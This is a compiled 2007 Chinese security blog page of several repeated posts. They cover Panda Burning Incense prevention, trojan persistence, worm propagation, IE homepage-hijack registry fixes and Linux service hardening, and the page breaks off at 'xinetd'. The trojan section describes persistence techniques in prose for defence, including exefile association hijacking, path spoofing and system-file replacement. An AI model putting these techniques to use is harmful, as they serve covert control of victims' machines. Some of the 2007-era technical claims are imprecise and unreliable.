預防為主 防范“熊貓燒香”病毒的方法
[ 2007-03-25 02:39:01 | 作者: sun ]
“熊貓燒香”病毒不但可以對用戶系統進行破壞,導致大量應用軟件無法使用,而且還可刪除擴展名為gho的所有文件,造成用戶的系統備份文件丟失,從而無法進行系統恢復;同時該病毒還能終止大量反病毒軟件進程,大大降低用戶系統的安全性。
這幾天“熊貓燒香”的變種更是表象異常活躍,近半數的網民深受其害。對于已經感染“熊貓燒香”病毒的用戶,建議參考《熊貓燒香病毒專殺及手動修復方案》,下載其中的專釘工具進行查殺,也可手動查殺。技術專家還總結了以下預防措施,幫你遠離“熊貓燒香”病毒的騷擾。
1、立即檢查本機administrator組成員口令,一定放棄簡單口令甚至空口令,安全的口令是字母數字特殊字符的組合,自己記得住,別讓病毒猜到就行。
修改方法:右鍵單擊“我的電腦”,選擇管理,瀏覽到本地用戶和組,在右邊的窗中,選擇具備管理員權限的用戶名,單擊右鍵,選擇設置密碼,輸入新密碼就行。
2.、利用組策略,關閉所有驅動器的自動播放功能。
步驟:單擊開始,運行,輸入gpedit.msc,打開組策略編輯器,瀏覽到計算機配置,管理模板,系統,在右邊的窗格中選擇關閉自動播放,該配置缺省是未配置,在下拉框中選擇所有驅動器,再選取已啟用,確定后關閉。最后,在開始,運行中輸入gpupdate,確定后,該策略就生效了。
3、修改文件夾選項,以查看不明文件的真實屬性,避免無意雙擊騙子程序中毒。
步驟:打開資源管理器(按windows徽標鍵+E),點工具菜單下文件夾選項,再點查看,在高級設置中,選擇查看所有文件,取消隱藏受保護的操作系統文件,取消隱藏文件擴展名。
4、時刻保持操作系統獲得最新的安全更新,建議用毒霸的漏洞掃描功能。
5、啟用windows防火墻保護本地計算機。
對于已經感染“熊貓燒香”病毒的用戶,建議參考《熊貓燒香病毒專殺及手動修復方案》,下載其中的專釘工具進行查殺,也可手動查殺。
對于未感染的用戶,專家建議,不要登陸不良網站,及時下載微軟公布的最新補丁,來避免病毒利用漏洞襲擊用戶的電腦,同時上網時應采用“殺毒軟件+防火墻”的立體防御體系。
這幾天“熊貓燒香”的變種更是表象異常活躍,近半數的網民深受其害。對于已經感染“熊貓燒香”病毒的用戶,建議參考《熊貓燒香病毒專殺及手動修復方案》,下載其中的專釘工具進行查殺,也可手動查殺。技術專家還總結了以下預防措施,幫你遠離“熊貓燒香”病毒的騷擾。
1、立即檢查本機administrator組成員口令,一定放棄簡單口令甚至空口令,安全的口令是字母數字特殊字符的組合,自己記得住,別讓病毒猜到就行。
修改方法:右鍵單擊“我的電腦”,選擇管理,瀏覽到本地用戶和組,在右邊的窗中,選擇具備管理員權限的用戶名,單擊右鍵,選擇設置密碼,輸入新密碼就行。
2.、利用組策略,關閉所有驅動器的自動播放功能。
步驟:單擊開始,運行,輸入gpedit.msc,打開組策略編輯器,瀏覽到計算機配置,管理模板,系統,在右邊的窗格中選擇關閉自動播放,該配置缺省是未配置,在下拉框中選擇所有驅動器,再選取已啟用,確定后關閉。最后,在開始,運行中輸入gpupdate,確定后,該策略就生效了。
3、修改文件夾選項,以查看不明文件的真實屬性,避免無意雙擊騙子程序中毒。
步驟:打開資源管理器(按windows徽標鍵+E),點工具菜單下文件夾選項,再點查看,在高級設置中,選擇查看所有文件,取消隱藏受保護的操作系統文件,取消隱藏文件擴展名。
4、時刻保持操作系統獲得最新的安全更新,建議用毒霸的漏洞掃描功能。
5、啟用windows防火墻保護本地計算機。
對于已經感染“熊貓燒香”病毒的用戶,建議參考《熊貓燒香病毒專殺及手動修復方案》,下載其中的專釘工具進行查殺,也可手動查殺。
對于未感染的用戶,專家建議,不要登陸不良網站,及時下載微軟公布的最新補丁,來避免病毒利用漏洞襲擊用戶的電腦,同時上網時應采用“殺毒軟件+防火墻”的立體防御體系。
焚燒系統里的木馬 徹底教你防殺木馬
[ 2007-03-25 02:38:48 | 作者: sun ]
“我想,我們應該燒掉這個東西。”3000多年前,面對希臘人突然遺留在戰場廢墟上的這只巨大的木馬,特洛伊王國的小王子帕里斯對他的父王說。因為他有一種不安的感覺,這個突然出現的物體會帶來厄運。然而沒有人聽他的話,整個軍隊固執的把這只龐然大物作為戰利品運回了城里。幾天后的夜里,藏在木馬里的希臘士兵從內部打開了特洛伊那堅不可摧的城門——特洛伊因此淪陷。如果帕里斯仍有靈魂存在的話,他也許會苦苦思索這個問題:如果當初我堅持把這個帶來厄運的東西焚燒掉,那么特洛伊將會是怎樣一種結局呢?請允許我改編情感作家姜湯的一句話:“二十一世紀的網絡是木馬橫行的世界,人類在解決病毒戰爭之后,最大的困惑就是木馬后門的攻防難題。”眾所周知,木馬(Trojan,或稱后門“BackDoor”)是一種危害巨大的程序,它們讓被害的計算機對著未知的入侵者敞開了大門,使得受害者的系統和數據暴露在混亂的網絡世界里。和病毒一樣,木馬也經歷了好幾代的演變,使得它越藏越深,成為另一種難以揪除的寄生蟲。——如果,我們趁早把木馬焚燒掉呢?
認識木馬
簡言之,信息領域的木馬,就是一種能潛伏在受害者計算機里,并且秘密開放一個甚至多個數據傳輸通道的遠程控制程序,它由兩部分組成:客戶端(Client)和服務器端(Server),客戶端也稱為控制端。木馬的傳播感染其實指的就是服務器端,入侵者必須通過各種手段把服務器端程序傳送給受害者運行,才能達到木馬傳播的目的。當服務器端被受害者計算機執行時,便將自己復制到系統目錄,并把運行代碼加入系統啟動時會自動調用的區域里,借以達到跟隨系統啟動而運行,這一區域通常稱為“啟動項”。當木馬完成這部分操作后,便進入潛伏期——偷偷開放系統端口,等待入侵者連接。到此為止,木馬還只處于被特洛伊的市民拉入城內的階段,是不會進行破壞行動的。當入侵者使用客戶端連接上木馬服務器端開放的端口后,特洛伊的城門就被打開了,到這里,木馬的噩夢才正式開始……所以,在木馬屠城的軍號吹響之前,如果帕里斯及時點燃了這只龐然大物,特洛伊也許就不會消失——至少,它不會是被一只木馬給毀掉的。
阻止木馬進城——不同時期的木馬形態與相應的系統保護
特洛伊被木馬計的前提是因為特洛伊人自己把藏有希臘士兵的木馬運進了城內,讓木馬計得以成功實施,換個角度,如果當初特洛伊人任憑木馬擱在海灘上發霉發臭,或者直接焚燒了這只裝載著厄運的東西,那么“特洛伊木馬”將會被作為與“馬奇諾防線”同樣性質的著名無效戰略而被列入史冊,而且后世可能再也不會采用這種攻擊手段。但是希臘人的木馬計成功了,正如現在數以千計的現代網絡木馬計成功了一樣。現代的希臘人——入侵者積極使用各種手段讓現代的特洛伊人——受害者把那只木馬程序高高興興的領回家去。早期的防病毒思想并不盛行,那時候的網民也比較單純,使用網絡防火墻的人也只有少數,所以那時候的入侵者可以算是幸福的,他們只需要一點簡單的社會工程學手段就能把木馬程序傳輸給對方執行,這一時期的木馬種植手段(如今的普遍稱謂為“下馬”)基本上不需要牽涉到技術,也許唯一需要的技術就是如何配置和使用一個木馬,因為那時候木馬也還是個新產物而已。那時候的網民,只能依靠自己的判斷和技術,才能免受或擺脫木馬之害。因此,當木馬技術剛在國內開始的時候,任意一個IP段都有可能存在超過40%的受害計算機開放著大門等待入侵者進攻,可以毫不夸張的說,那時候是木馬的第一黃金時期,唯一美中不足的制約條件就是當時的網絡速度普遍太慢了。隨著時間的流逝,木馬技術發展日益成熟,但網民的安全意識也普遍提高,更出現了初期的病毒防火墻概念,這個時期的入侵者必須掌握更高級的社會工程學手段和初期的入侵技術才能讓對方受害了,這時期的木馬雖然隱蔽性有了相對提高,但仍然是基于客戶端尋找連接服務器端的模式。由于出現了病毒防火墻,網民判斷和查殺木馬的效率大大提高,而且大部分人也知道“人心不古”了,不再輕易接收陌生人給的程序,使得木馬不再像上時期那樣肆無忌彈的橫行,但是因為病毒防火墻是個新興產物,仍然有相對多的人沒有安裝使用,以至于許多老舊的木馬依然可以橫行無忌。再后來,隨著網絡防火墻技術誕生和病毒防火墻技術的成熟,木馬作者被迫緊跟著防病毒廠商的腳步更新他們的作品以避免馬兒過早“殉職”,同時由于網絡防火墻技術的出現,讓計算機與網絡之間不再直接,尤其是網絡防火墻實現的“攔截外部數據連接請求”與“審核內部程序訪問網絡請求”的策略,導致大部分木馬紛紛失效,這時期的木馬逐漸分裂成兩個派別:一種依然采用客戶端連接服務器端的方式,只是改為了其他傳輸途徑,如E-MAIL、FTP等,或者在內部除掉網絡防火墻,以便自己暢通無阻;另一種則改變了入侵的思維,把“客戶端連接服務器端”變為“服務器端連接客戶端”,再加上一點社會工程學技術,從而突破了網絡防火墻的限制,也因此誕生了一種新的木馬技術——“反彈型”木馬。這一時期里,入侵者與受害者之間的戰爭終于提升到技術級別,若想保護自己,除了安裝網絡防火墻和病毒防火墻,以及接觸網絡攻防技術以外別無他法,這個“基礎互動”一直保持到今天的XP時代。到了XP時代,網絡速度有了質的飛躍,黑客攻防戰更是越來越多的浮上水面,因為系統變了,一個專門為網絡應用而誕生的操作系統,必定會存在與網絡有關的缺陷。沒錯,WinXP相對于Win9x的弱點就是它的網絡漏洞太多了,無論是利用MIME漏洞傳播的信件木馬,還是通過LSASS溢出而放下的木馬,都能在XP系統上分到一塊肉。你也許會說,Win9x同樣有許多漏洞,但是為什么它沒有XP的煩惱?這是因為Win9x的網絡功能太弱了,幾乎沒有什么系統組件需要依靠網絡運行!所以現在的用戶,除了使用網絡防火墻和病毒防火墻把自己包裹得嚴嚴實實以外,還要三天兩頭去微軟的系統更新站點安裝各種漏洞修復程序……
別讓士兵們下馬!——防止木馬啟動
話說藏在木馬里的希臘士兵入城以后,并沒有急著下馬屠城,而是待到夜深人靜之時,才出來打開了牢固的城門,為特洛伊的毀滅奏響了哀歌。而計算機內部沒有人類社會的地理和時間關系,即使你的硬盤里現在就存放著100個木馬程序,它們也比特洛伊海灘上那只大木馬的處境好不到哪里去,因為對于操作系統來說,任何有害程序只要沒有運行,它就可以等同于那些未能下馬的士兵,一律視為無害。要讓系統變成特洛伊城的黑夜,唯一的方法只能是啟動木馬的服務器端,而啟動木馬的最簡單途徑,就是通過“啟動項”加載運行。任何操作系統都會在啟動時自動運行一些程序,用以初始化系統環境或額外功能等,這些被允許跟隨系統啟動而運行的程序被放置在專門的區域里供系統啟動時加載運行,這些區域就是“啟動項”,不同的系統提供的“啟動項”數量也不同,對于Win9x來說,它提供了至少5個“啟動項”:DOS環境下的Autoexec.bat、Config.sys,Windows環境下的“啟動”程序組、注冊表的2個Run項和1個RunServices項,到了2000/XP系統時代,DOS環境被取消,卻新增了一種稱之為“服務”的啟動區域,這么多的啟動入口,木馬自然不會放過,于是我們經常在一些計算機的啟動項里發現陌生的程序名,這時候就只能交由你或者病毒防火墻來判斷了,畢竟系統自身會在這里放置一些必要的初始化程序,還有一些正常工具,包括病毒防火墻和網絡防火墻,它們也必須通過啟動項來實現跟隨系統啟動。此外還有一種不需要通過啟動項也能達到跟隨系統啟動的卑劣手法,那就是“系統路徑遍歷優先級欺騙”,Windows系統搜尋一個不帶路徑信息的文件時遵循一種“從外到里”的規則,它會由系統所在盤符的根目錄開始向系統目錄深處遞進查找,而不是精確定位的,這就意味著,如果有兩個同樣名稱的文件分別放在C:\和C:\Windows下,Windows會執行C:\下的程序,而不是C:\Windows下的。這樣的搜尋邏輯就給入侵者提供了一個機會,木馬可以把自己改為系統啟動時必定會調用的某個文件名,并復制到比原文件要淺一級以上的目錄里,Windows就會想當然的執行了木馬程序,系統的噩夢就此拉開序幕。這種手法常被用于“internat.exe”,因為無論哪個Windows版本的啟動項里,它都是沒有設置路徑的。要提防這種占用啟動項而做到自動運行的木馬,用戶必須了解自己機器里所有正常的啟動項信息,才能知道木馬有沒有混進來。至于利用系統路徑漏洞的木馬,則只能靠用戶自己的細心了。為什么它無法根除?——文件并聯型木馬的查殺某些用戶經常會很郁悶,自己明明已經刪除了木馬文件和相應的啟動項,可是不知道什么時候它自己又原封不動的回來了,這還不算,更悲慘的是有時候殺掉某個木馬后,系統也出了故障:所有應用程序都打不開了。這時候,如果用戶對計算機技術的了解僅限于使用殺毒軟件,那可只能哭哭啼啼的重裝系統了!為什么會這樣?難道這種木馬還惡意修改了系統核心?其實答案很簡單,因為這種木馬修改了應用
程序(EXE文件)的并聯方式。
什么是“并聯方式”呢?在Windows系統里,文件的打開操作是通過注冊表內相應鍵值指定的應用程序來執行的,這個部分位于注冊表的“HKEY_CLASSES_ROOT”主鍵內,當系統收到一個文件名請求時,會以它的后綴名為依據在這里識別文件類型,進而調用相應的程序打開。而應用程序自身也被視為一個文件,它也屬于一種文件類型,同樣可以用其他方式開啟,只不過Windows設置它的調用程序為“"%1" %*”,讓系統內核理解為“可執行請求”,它就會為使用這種打開方式的文件創建進程,最終文件就被加載執行了,如果有另外的程序更改了這個鍵值,Windows就會調用那個指定的文件來開啟它。一些木馬程序把EXE后綴名對應的exefile類型的“打開方式”改成了“木馬程序 "%1" %*”,運行程序時系統就會先為“木馬程序”創建進程,把緊跟著的文件名作為參數傳遞給它執行,于是在我們看來程序被正常啟動了。因為木馬程序被作為所有EXE文件的調用程序,使得它可以長期駐留內存,每次都能恢復自身文件,所以在一般用戶看來,這個木馬就做到了“永生不死”。然而一旦木馬程序被刪除,Windows就會找不到相應的調用程序,于是正常程序就無法執行了,這就是所謂的“所有程序都無法運行”的情況來源,并不是木馬更改了系統核心,更沒必要因此重裝整個系統。根除這種木馬的最簡單方法只需要查看EXE文件的打開方式被指向了什么程序,立即停止這個程序的進程,如果它還產生了其他木馬文件的話,也一起停止,然后在保持注冊表編輯器開啟著的情況下(否則你的所有程序都會打不開了)刪除掉所有木馬文件,把exefile的“打開方式”項(HKEY_CLASSES_ROOT\exefile\shell\open\command)改回原來的“”%1” %*”即可。
如果刪除木馬前忘記把并聯方式改回來,就會發現程序打不開了,這時候不要著急,如果你是Win9x用戶,請使用“外殼替換大法”:重啟后按F8進入啟動菜單選擇MS-DOS模式,把Explorer.exe隨便改個名字,再把REGEDIT.EXE改名為Explorer.exe,再次重啟后會發現進入Windows只剩下一個注冊表編輯器了,趕快把并聯方式改回來吧!重啟后別忘記恢復以前的Explorer.exe。對于Win2000/XP用戶而言,這個操作更簡單了,只要在開機時按F8進入啟動菜單,選“命令提示符的安全模式”,系統就會自動調用命令提示符界面作為外殼,直接在里面輸入REGEDIT即可打開注冊表編輯器!XP用戶甚至不需要重啟,直接在“打開方式”里瀏覽到CMD.EXE就能打開“命令提示符”界面運行注冊表編輯器REGEDIT.EXE了。
偷梁換柱——追回被盜的系統文件
除了添加自己到啟動項、路徑欺騙和更改文件并聯以外,一般的木馬還有一種計倆可以使用,那就是替換系統文件。由于如今的操作系統都是由許多文件共同構造的,并不是所有用戶都能明白系統文件夾里每個文件的作用,這就給了木馬可乘之機,它們盯上了系統里那些不會危害到系統正常運行而又經常會被調用的程序文件,像輸入法指示程序internat.exe、讓動態鏈接庫可以像程序一樣運行的rundll32.exe等。木馬先把系統原來的文件改名成只有它們自己知道的一個偏僻文件名,再把自己改名成那個被替換的文件,這樣就完成了隱藏極深的感染工作,從此只要系統需要調用那個被替換的程序進行工作,木馬就能繼續駐留內存了。那么文件被替換會不會導致系統異常呢?只要木馬沒有被刪除,就不會造成系統異常,因為木馬在作為原來的程序而被系統啟動時,會獲得一個由系統傳遞來的運行參數,這就是系統要求該程序工作的關鍵所在,木馬會直接把這個參數傳遞給被改名的程序執行,像接力比賽那樣完成數據操作,這樣在系統看來就是命令被正常執行了,自然不會出現異常。但是也因為這樣的特性導致木馬被查殺后,系統的某些命令無法傳遞到本該執行操作的程序中,反而讓系統出錯了。
要修復它其實很簡單,只要記住這個木馬的文件名,在刪除它之后再從系統光盤復制一個“原配”文件就可以了,如果沒有系統光盤,就必須通過工具追蹤木馬傳遞參數的目標程序名,再把它改回來。
結束語
木馬的發展促進了安全技術的提高,而安全技術的提高又迫使木馬必須往更高的級別發展,到現在木馬已經形成了多個派系的共存,偵測它們的方法也不能再像以前那樣簡單了,例如檢測異常端口的方法對于反彈木馬而言是無效的,它并不在本機開放端口;就算防火墻能阻止內部未授權程序訪問網絡,但那只能針對TCP/UDP協議的木馬,別忘記了還有ICMP后門的存在,防火墻通常不會阻止這類報文的。雖然ICMP協議的數據報文能完成的事情相對較少,但是對于一般的命令控制,它已經足夠了……
蠕蟲是如何通過Email、漏洞、文件共享、P2P傳播?
[ 2007-03-25 02:38:34 | 作者: sun ]
蠕蟲傳播渠道:
1、Email
這似乎是網絡中永恒的主題。簡簡單單的操作,就讓IT世界大亂。
基本傳播流程是:在宿主機器上搜集Email地址,然后向這些地址發送自身。這個過程其實很簡單,病毒作者通常考慮最多的是怎樣隱藏,怎樣感染,怎樣構造有效的Social Engineer,而不是怎樣通過網絡傳播。這讓我想起了DOS時代的病毒,其實DOS就那么點東西,但病毒考慮的不是怎樣利用DOS進行感染,而是怎樣加密,反跟蹤。
2、Web server 漏洞
這種蠕蟲,與其說是計算機病毒,倒不如說是網絡漏洞的附庸。
基本傳播流程是:在宿主機器上掃描網絡(一般是隨機產生IP),然后對每個IP進行測試,如果發現該IP上有活著的有漏洞的Server,就利用漏洞把自身傳播到該IP的機器上。
這個過程要比發送mail復雜的多,但編寫者重點放在怎樣發包,怎樣構造ShellCode。
值得一提的是,這三種頗具威力的蠕蟲,都傳說是出自中國人之手。
3、LAN,文件共享
這種感染方式,最簡單不過了,原理上,可以把共享的磁盤當作本地磁盤一樣,可以對之Copy病毒自身,或者感染其上的文件。值得注意的是,隨著Internet上的文件共享的增加,現在有越來越多的蠕蟲通過文件共享傳播。
4、感染本地文件
由于蠕蟲感染文件的復雜性,一般的蠕蟲作者往往忽略了感染本地文件,結果在被感染的系統上只有孤零零的一個病毒程序。如果大量感染本地文件,我們普通用戶的清除病毒工作難度將加大。
1、Email
這似乎是網絡中永恒的主題。簡簡單單的操作,就讓IT世界大亂。
基本傳播流程是:在宿主機器上搜集Email地址,然后向這些地址發送自身。這個過程其實很簡單,病毒作者通常考慮最多的是怎樣隱藏,怎樣感染,怎樣構造有效的Social Engineer,而不是怎樣通過網絡傳播。這讓我想起了DOS時代的病毒,其實DOS就那么點東西,但病毒考慮的不是怎樣利用DOS進行感染,而是怎樣加密,反跟蹤。
2、Web server 漏洞
這種蠕蟲,與其說是計算機病毒,倒不如說是網絡漏洞的附庸。
基本傳播流程是:在宿主機器上掃描網絡(一般是隨機產生IP),然后對每個IP進行測試,如果發現該IP上有活著的有漏洞的Server,就利用漏洞把自身傳播到該IP的機器上。
這個過程要比發送mail復雜的多,但編寫者重點放在怎樣發包,怎樣構造ShellCode。
值得一提的是,這三種頗具威力的蠕蟲,都傳說是出自中國人之手。
3、LAN,文件共享
這種感染方式,最簡單不過了,原理上,可以把共享的磁盤當作本地磁盤一樣,可以對之Copy病毒自身,或者感染其上的文件。值得注意的是,隨著Internet上的文件共享的增加,現在有越來越多的蠕蟲通過文件共享傳播。
4、感染本地文件
由于蠕蟲感染文件的復雜性,一般的蠕蟲作者往往忽略了感染本地文件,結果在被感染的系統上只有孤零零的一個病毒程序。如果大量感染本地文件,我們普通用戶的清除病毒工作難度將加大。
系統安全之解決IE被惡意修改方法總結
[ 2007-03-25 02:38:17 | 作者: sun ]
【編者按:文中出于安全原因,將“http”替換為“hxxp”!】
經常聽到別人說自己電腦的IE被惡意修改了,我也曾經經常遇到過,做事做的好好,突然蹦出個網頁實在是郁悶到極點啊。后來我就在網上亂搜一通,簡單總結了下他們的方法特在此版塊發給新手門,尤其是玩黑的!大概有下面幾種解決方法吧。
一、修改IE工具欄
在一般情況下,IE首頁的修改可以通過IE工具欄里的“工具”-“Internet選項”-“常規”-“主頁”功能模塊來實現。在彈出的窗口里,用戶只要在“可更改主頁”的地址欄中輸入自己經常使用的網址然后再點擊下面的“使用當前頁”按鈕就可以將其設為自己的IE首頁了;如果是點擊了“使用默認頁”則一般會使IE首頁調整為微軟中國公司的主頁;至于“使用空白頁”選項則是讓IE首頁顯示為“about:blank”字樣的空白頁,這樣便于輸入網址。
二、修改注冊表
很多情況下,由于受了惡意程序的控制,或中了木馬病毒,上面的方法根本不奏效,甚至有時候,“可更改主頁”的地址欄都變成了灰色,無法再進行調整;有時候,即使你把網址改回來了,再開啟IE瀏覽器,那個惡意網址又跑回來了。 實在是頭大~~如果這樣的話,最通常的辦法就是修改注冊表文件。我們首先啟動Windows的注冊表編輯器,具體方法是點擊Windows界面左下角的“開始”按鈕,再選擇“運行”,在彈出的對話框中輸入“regedit”就可以進入注冊表編輯器了。IE首頁的注冊表文件是放在:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
下的,而這個子鍵的鍵值就是IE首頁的網址。以筆者的電腦為例,鍵值是hxxp://www.hao123.com,它是可以修改的,用戶可以改為自己常用的網址,或是改為“about: blank”,即空白頁。這樣,你重啟IE就可以看到效果了。如果這種方法也不能奏效,那就是因為一些病毒或是流氓軟件在你的電腦里面安裝了一個自運行程序,就算你通過修改注冊表恢復了IE首頁,但是你一重新啟動電腦,這個程序就會自動運行再次篡改。這時候,我們需要對注冊表文件進行更多的修改,運行“regedit”,然后依次展開
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
主鍵,然后將其下的不知明的啟動子鍵值刪除,然后對應刪除其不知明的自運行程序文件,最后從IE選項中重新設置起始頁就好了。除了上面的情況外,有些IE被改了首頁后,即使設置了“使用默認頁”仍然無效,這是因為IE起始頁的默認頁也被篡改啦。對于這種情況,我們同樣可以通過修改注冊表來解決,運行“regedit”展開:
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\Default_Page_URL
子鍵,然后將“Default_Page_UR”子鍵的鍵值中的那些篡改網站的網址改掉就好了,或者設置為IE的默認值。
三、使用IE修復軟件
雖然修改注冊表的方法十分有效,但是對于一般的電腦用戶來說較為專業,而且編輯過程中也涉及到了比較多的英語。因此,我們在這里介紹大家使用一些專門的修復工具。一般來說,IE修復工具有兩大類。一是商業機構提供的輔助性工具,如瑞星注冊表修復工具、3721的上網助手中附帶的IE修復專家、超級兔子中的IE修復工具等等,這些軟件大多捆綁在商業軟件或是工具軟件中,有些還需要付費才能夠使用。其特點是,功能強大,建議經濟實力較強的用戶使用。其中瑞星的注冊表修復工具是可以免費單獨下載的,具體的使用辦法可以參考這些軟件的幫助文件。還有一點就是看系統啟動項在運行里輸入msconfig 查看啟動項,你在這里可以查到每次開機時訪問的網站URL地址,還有一種是在啟動欄中有一個連接到本機的連接,該連接有可能是連接到一個*.js的文件,查找時要細心,左邊的選勾去掉后,再按照路徑把*.JS文件刪除,然后重新啟動系統就可以了。
經常聽到別人說自己電腦的IE被惡意修改了,我也曾經經常遇到過,做事做的好好,突然蹦出個網頁實在是郁悶到極點啊。后來我就在網上亂搜一通,簡單總結了下他們的方法特在此版塊發給新手門,尤其是玩黑的!大概有下面幾種解決方法吧。
一、修改IE工具欄
在一般情況下,IE首頁的修改可以通過IE工具欄里的“工具”-“Internet選項”-“常規”-“主頁”功能模塊來實現。在彈出的窗口里,用戶只要在“可更改主頁”的地址欄中輸入自己經常使用的網址然后再點擊下面的“使用當前頁”按鈕就可以將其設為自己的IE首頁了;如果是點擊了“使用默認頁”則一般會使IE首頁調整為微軟中國公司的主頁;至于“使用空白頁”選項則是讓IE首頁顯示為“about:blank”字樣的空白頁,這樣便于輸入網址。
二、修改注冊表
很多情況下,由于受了惡意程序的控制,或中了木馬病毒,上面的方法根本不奏效,甚至有時候,“可更改主頁”的地址欄都變成了灰色,無法再進行調整;有時候,即使你把網址改回來了,再開啟IE瀏覽器,那個惡意網址又跑回來了。 實在是頭大~~如果這樣的話,最通常的辦法就是修改注冊表文件。我們首先啟動Windows的注冊表編輯器,具體方法是點擊Windows界面左下角的“開始”按鈕,再選擇“運行”,在彈出的對話框中輸入“regedit”就可以進入注冊表編輯器了。IE首頁的注冊表文件是放在:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
下的,而這個子鍵的鍵值就是IE首頁的網址。以筆者的電腦為例,鍵值是hxxp://www.hao123.com,它是可以修改的,用戶可以改為自己常用的網址,或是改為“about: blank”,即空白頁。這樣,你重啟IE就可以看到效果了。如果這種方法也不能奏效,那就是因為一些病毒或是流氓軟件在你的電腦里面安裝了一個自運行程序,就算你通過修改注冊表恢復了IE首頁,但是你一重新啟動電腦,這個程序就會自動運行再次篡改。這時候,我們需要對注冊表文件進行更多的修改,運行“regedit”,然后依次展開
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
主鍵,然后將其下的不知明的啟動子鍵值刪除,然后對應刪除其不知明的自運行程序文件,最后從IE選項中重新設置起始頁就好了。除了上面的情況外,有些IE被改了首頁后,即使設置了“使用默認頁”仍然無效,這是因為IE起始頁的默認頁也被篡改啦。對于這種情況,我們同樣可以通過修改注冊表來解決,運行“regedit”展開:
HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\Default_Page_URL
子鍵,然后將“Default_Page_UR”子鍵的鍵值中的那些篡改網站的網址改掉就好了,或者設置為IE的默認值。
三、使用IE修復軟件
雖然修改注冊表的方法十分有效,但是對于一般的電腦用戶來說較為專業,而且編輯過程中也涉及到了比較多的英語。因此,我們在這里介紹大家使用一些專門的修復工具。一般來說,IE修復工具有兩大類。一是商業機構提供的輔助性工具,如瑞星注冊表修復工具、3721的上網助手中附帶的IE修復專家、超級兔子中的IE修復工具等等,這些軟件大多捆綁在商業軟件或是工具軟件中,有些還需要付費才能夠使用。其特點是,功能強大,建議經濟實力較強的用戶使用。其中瑞星的注冊表修復工具是可以免費單獨下載的,具體的使用辦法可以參考這些軟件的幫助文件。還有一點就是看系統啟動項在運行里輸入msconfig 查看啟動項,你在這里可以查到每次開機時訪問的網站URL地址,還有一種是在啟動欄中有一個連接到本機的連接,該連接有可能是連接到一個*.js的文件,查找時要細心,左邊的選勾去掉后,再按照路徑把*.JS文件刪除,然后重新啟動系統就可以了。
教你配置Linux操作系統安全管理服務
[ 2007-03-25 02:38:01 | 作者: sun ]
任何計算機安全措施的一個重要方面是維持實際控制服務的運行。本文向你展示了在Linux操作系統的PC機上如何配置安全服務管理。
任何計算機安全措施的一個重要方面是維持實際控制服務的運行,讓不必要的網絡服務接受請求將提高系統的安全風險。即使這些網絡服務對于服務器的某些功能是必要的也需要仔細管理,并且對其進行配置最小化不受歡迎的入侵和登錄的可能性。
為Linux系統配置安全性時,使用/etc/inittab文件、runlevels和一兩個服務管理“superdaemons”如inetd或xinetd直接管理服務。
inittab
/etc/inittab文件用于系統的初始化過程啟動系統服務。在一個配置好的系統上,雖然它一般都不會包括很多服務,但是在某些Linux系統的默認安裝中會加載很多其他服務。/etc/inittab文件內容有些模糊,它的重要之處在于讓服務管理變得相對簡單。
首先,可不要通過/etc/inittab文件方式向系統啟動項中添加服務。
第二,不要移除/etc/inittab文件中第一個冒號之前其第一個字段是單精度型的數字,或整個登錄服務的前面部分。以單精度數字開頭的行可以打開TTY控制臺,所有服務在它們打開之前都一一列出,甚至列出其更重要的功能。也許有些例外情況,在不改動它時是很安全的,尤其如果不確定的情況下請不要改動。
第三,/etc/inittab在導入和runlevel選擇的時候用于過程管理。一般不用于正常的系統操作。
第四,在導入時由rc系統開始添加步驟,而不是init系統。如果看看/etc/inittab的內容,將會注意到登錄以rc0到rc6這樣的字符結束。這是初始化系統如何處理runlevels的說明。
runlevels
基于Linux操作系統的運轉可以通過runlevels進行管理。不同的runlevels被定義成有不同的行為,就像Windows操作系統一樣,它有正常操作模式、安全模式、在某些情況下還有DOS模式。
Runlevel 0用于關閉系統,如果軟電源設置恰當,它能關閉系統電源。
Runlevel 1是單用戶無網絡的模式,它用于低水平的故障修復和管理操作。
Runlevel 2到Runlevel 5正常系統操作的多用戶模式。Runlevel2和3是命令行模式,3有網絡連接而2沒有網絡連接。Runlevel 5用于啟動X Windows提供圖形用戶接口。
Runlevel 6用于系統重啟,當整個init系統甚至bootloader 需要重啟時采用它。
其他runlevels由系統管理員進行定義,但是“傳統”UNIX系統沒有此功能。這種情況下,他們不能被定義也不能被使用。
在shell處,可以輸入runlevel命令找到以前的renlevel和當前runlevel。如果沒有更改系統 runlevel ,命令的輸出結果為大寫N后面跟runlevel的數字,這里的N表示沒有前runlevel,如果要更改runlevel,可以使用init命令,后面跟想要使用到的runlevel的數字。例如,輸入init 6表示重啟系統,或init 1 進入單用戶模式。
配置runlevel的過程每一版本的情況都不同。例如,在Debian GNU/Linux系統中,位于/etc/init.d的服務腳本有來自/etc/rcN.d的路徑與它們進行鏈接,這里的N表示需要配置的runlevel數字。以字母K開頭的symlinks指示在進入runlevel時被殺死的程序,而以字母 S開頭的symlinks指示在進入runlevel時被啟動的程序。字母后面的數字值越大,從1到99,表示啟動或殺死的時間愈靠后。
大多數基于RPM的版本都采用RedHat所用到的rc系統。比起基于Debian的系統,這一系統使用更復雜的路徑結構,并且不同的基于RPM的系統之間也有很大的不同。說明書上提供了更多的關于管理runlevel的信息。
inetd
一個用于Linux后臺程序管理的“superdaemon”是眾所周知的inetd,它是個用于服務管理的命令行工具。終止服務很簡單:首先,作為根用戶用文本編輯器打開/etc/inetd.conf文件。接下來,找到文件中需要終止的服務。最后,在服務所在行的最前面添加#符號(其他還有“尖頂符”和“英鎊符”),如下所示。“注釋掉”這一行,因此inted以后都不會啟動這一服務。
編輯之前服務登錄可能是下面這樣:
ident stream tcp wait identd /usr/sbin/identd identd
停止之后,服務登錄變成下面這個樣子:
# ident stream tcp wait identd /usr/sbin/identd identd
如果正在卸載被登錄參考的后臺程序,可以刪除文件中的某些行——是否通過包管理器進行卸載或刪除執行文件卸載(對于上面的例子是/usr/sbin/identd文件)。
編輯/etc/inetd.conf文件之后,保存它,inetd以后則可以使用更改。編輯和保存一旦完成,可以在根部輸入下面的命令使更改即時生效:
kill -HUP `pidofinetd`
使用修改(保存)后的配置文件會導致inetd重啟。
xinetd
